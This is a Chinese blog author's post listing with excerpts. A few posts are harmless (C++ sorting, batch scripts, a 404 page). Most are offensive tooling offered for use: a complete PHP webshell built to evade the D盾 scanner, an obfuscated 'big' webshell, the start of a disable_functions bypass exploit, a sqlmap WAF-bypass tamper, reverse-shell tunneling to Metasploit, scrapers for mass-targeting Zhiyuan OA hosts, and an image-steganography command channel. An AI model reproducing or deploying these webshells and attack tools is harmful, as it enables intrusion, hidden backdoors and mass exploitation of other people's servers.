- 博客(20)
- 资源 (6)
- 收藏
- 关注
RSS订阅
原创 sqlmap 双写关键字绕过 tamper
双写绕过的存在一般都是在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过但是鉴于手注有些小麻烦,所以还是上sqlmapsqlmap中无双写注入的脚本,所以我编写了一个tamper,可以根据测出的被ban的关键词进行修改:#!/usr/bin/env python'''sqlmap 双写绕过by:shadowwolf'''from lib.core.compat import xrangefrom lib.core.enums i
2020-08-30 00:27:43
2570
1
原创 [Natapp ngork]内网映射与msf联动
0x00先附上原理图0x01首先到https://natapp.cn/注册一个用户然后 购买免费隧道 ,当然你也可以买付费的 (白嫖什么的最快乐啦)0x02然后在你的客户端运行natapp客户端windows:natapp -authtoken=xxxxxxx(此处为你的token)linux:先进入natapp的目录下chmod +x natapp./natapp --authtoken=xxxxxxx(此处为你的token)0x03生成一个反弹马来联动msf:先配
2020-05-23 20:00:59
437
2
原创 [c++] 关于排序的一些注意事项
函数名功能描述sort对给定区间所有元素进行排序stable_sort对给定区间所有元素进行稳定排序partial_sort对给定区间所有元素部分排序partial_sort_copy对给定区间复制并排序nth_element找出给定区间的某个位置对应的元素is_sorted判断一个区间是否已经排好序partition使得符合某个条件的元素放在前面stable_partition相对稳定的使得符合某个条件的元素放在前面要使用此函数只需用#include sort即可使用
2020-05-16 15:18:28
273
1
原创 [Bat]用BAT实现快速对比文件内容
最近想要比较两个文件的数据但是因为文件都很大,没法手动查阅进行对比所以我用windows的fc命令来简化对比过程代码如下:@echo off:loopmake_datanumbernumber0fc 作比较的文件1.txt 作比较的文件2.txtif errorlevel==1 pausegoto loop把以上代码复制进txt后改bat即可...
2020-05-16 15:14:43
3106
原创 [PHP]用php的curl_post写一个爬取百度搜索结果的api
0x01 起因 因为手速慢,漏洞刷不过别人,一个个手补确实慢,所以想自己写一个api,一键抓取zoomeye的20页,然后就可以打批量了 ovo(真是太妙了!)0x01 动工 1.抓包做准备要做一个抓取的,当然是先抓包啦~拿出我的bp,和zoomeye篇一样先输入一个关键字,方便在bp里面找我输入的关键字然后回车~发现我输入的关键字在这个GET的请求包里面用repeat模块后:发现返回了我要的搜索结果 &nbs
2020-05-16 14:17:43
1780
原创 [PHP]用PHP自己写一个zoomeye的api(偷懒必备quq)
0x01 起因 因为手速慢,漏洞刷不过别人,一个个手补确实慢,所以想自己写一个api,一键抓取zoomeye的20页,然后就可以打批量了 ovo(真是太妙了!)0x01 动工 1.抓包做准备要做一个抓取的,当然是先抓包啦~拿出我的bp~先输入一个关键字,方便在bp里面找我输入的关键字然后回车~发现我输入的关键字在这个GET的请求包里面,但是他到底是不是呢?发送到repeat模块看看呗
2020-05-09 17:10:33
3256
3
原创 PHP小马免杀的浅谈[过最新D盾]
PHP小马免杀的浅谈[过最新D盾] 绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_content方法2 使用fwrite绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_contentD盾还是报了,但如果是PHP7.0以上的,还是有绕过方法滴:<?php/*T00ls.net shadowwolf2021-7-25*/( ~urldec
2021-07-25 13:49:09
774
2
原创 完美解决树莓派bcm_host.h: No such file or directory问题
解决bcm_host.h: No such file or directory问题这个问题产生的原因到底是因为树莓派/opt下缺少bcm_host.h所以想办法安装上就好了sudo apt-get install libraspberrypi-dev
2021-02-06 19:42:45
1896
原创 fofa批量获取致远oa【py脚本】
首先获取fofa中cookie中的_fofapro_ars_session=然后填入下面的xxxxx中然后运行即可import requests,reimport timesession = "_fofapro_ars_session=xxxxx"header = { "Accept":"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.0
2021-01-24 12:06:22
2719
6
原创 一款过d盾PHP小马
<?php$_='%99%88%8D%96%8B%9A';$pass='a';$rand_=rand();$a=$_POST[$pass];$file=md5('shadowwolf');$shell='<?php '.$a.' ?>';$myfile = fopen($file, "w");(~urldecode($_))($myfile, $shell);include $file;可以自己测测看啊
2020-12-14 22:23:31
340
2
原创 如何利用今日头条的图片功能做命令执行
最近有点无聊,逛今日头条发现有图片上传功能,想利用一波,拿来做远控命令执行的跳板大概思路是,得到了头条的图片上传接口,上传图片,该图片是用steghide隐写进去的,主要是测了一下,今日头条的图片不会被压缩(360识图这些地方都有轻度的图片压缩,在下载到本地的时候不能steghide解密),然后就可以利用:利用过程大概是下面这样:控制端发送指令->指令隐写到图片中(发给被控端只有一个url)->被控端检测到url后下载到本地(然后用文件夹里的steghide把图片里面的命令拿出,然后执行)-
2020-11-14 19:58:18
529
原创 wmctf web部分wp(非官方qwq
web_checkin<?php//PHP 7.0.33 Apache/2.4.25error_reporting(0);$sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);@mkdir($sandbox);@chdir($sandbox);highlight_file(__FILE__);if(isset($_GET['content'])) { $content = $_GET['content'];
2020-08-04 20:02:38
1742
原创 远程桌面身份验证错误:要求的函数不正确等处理
1.可能是oracle 加密修正问题但是,你都找到这里来了,说明这个方法解决不了问题quq2.使用注册表解决问题适用于 可能没有修正Oracle的功能Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP][HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr
2020-07-25 10:57:07
149
原创 分享一个简单唯美的404页
<?phpheader("HTTP/1.1 404 Not Found");header("Status: 404 Not Found");function random_poem(){ $poems="人生的价值,并不是用时间,而是用深度去衡量的。-- 列夫·托尔斯泰 三人行,必有我师焉。择其善者而从之,其不善者而改之。——孔子 人生不是一种享乐,而是一桩十分沉重的工作。-- 列夫·托尔斯泰 成为卓越的代名词,很多人并不需要杰出素质的环境。——Steve Jobs 活着就是为了改变世
2020-07-19 16:24:24
1766
2
原创 分享一个php下,linux下突破system命令限制的马(方法)
<?php$cmd=$_GET["cmd"];pwn($cmd);function pwn($cmd) { global $abc, $helper; function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address
2020-07-09 19:22:28
578
原创 一枚php大马放送~
<?php$password='admin';//pass$shellname='shadowwolf专用大马';//my_name$myurl='https://blog.csdn.net/qq_25017571';//my_url$____ = "fmIEEg4bXwgWDx0ODQUbEl8NDRUWXlU7CxIUAAgDW09WKFxCExcWPhU7B1IiRDggQ1IXESZVNjM9Hw4HAlwSNQ45ISQLAQcpIA0uByIbOCISEjAFPjYEIQgtBl8
2020-06-06 15:00:13
87699
1
原创 [每日干货]:分享一个ctf及平时都可用到的一个在线php审计的工具
每日干货:https://phpchip.com/CHIP 挖掘所有PHP动态特性个人感觉和seay审计差不多不过PHPchip也算是另一种方法叭当我上传一个PHP一句话马文件(免杀)的时候:先附上代码:<?php$cmd=$_GET["cmd"];pan($cmd);function pwn($cmd) { global $abc, $helper; function str2ptr(&$str, $p = 0, $s = 8) { $ad
2020-05-23 17:33:52
820
原创 [工具]编写一个简易扒站小工具
所谓扒站,不就是把他用到的资源下载到本地嘛所以可以套用wget来递归下载@echo off title 扒站工具echo by:shadowwolfcolor 80mode con cols=72 lines=22:menuset /p a=请输入网址:color 2fmode con cols=80 lines=25wget.exe -r -p -np -k --no-check-certificate %a% clstitle 任务完成-echo 扒站完毕!请按回车退出!e
2020-05-16 15:40:33
307
原创 [bat]自动安装richtx32.ocx
“运行时错误“339” 部件"Tabctl32.ocx"或其附件之一不能正确注册:一个文件丢失或无效。”解决问题:下载Richtx32.ocx然后写一个bat放在同目录:Copy /y Richtx32.ocx %windir%\system32regsvr32 /s %windir%\system32\Richtx32.ocxpause然后双击bat之后就能自动安装啦...
2020-05-16 15:34:00
1180
原创 [c++]关于c++中的beep函数的说明
========低音部分低1DO:262#1DO#:277低2RE:294#2RE#:311低3MI:330低4FA:349#4FA#:370低5SO:392#5SO#:415低6LA:440#6LA#:466低7SI:494========中音部分=低音X2中1DO:523 956us FC44;#1DO#:554 902us中2RE:578 865us FC9F;#2RE#:622 803us中3MI:659 759us FD09;中4FA:698 716us FD
2020-05-16 15:20:17
631
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人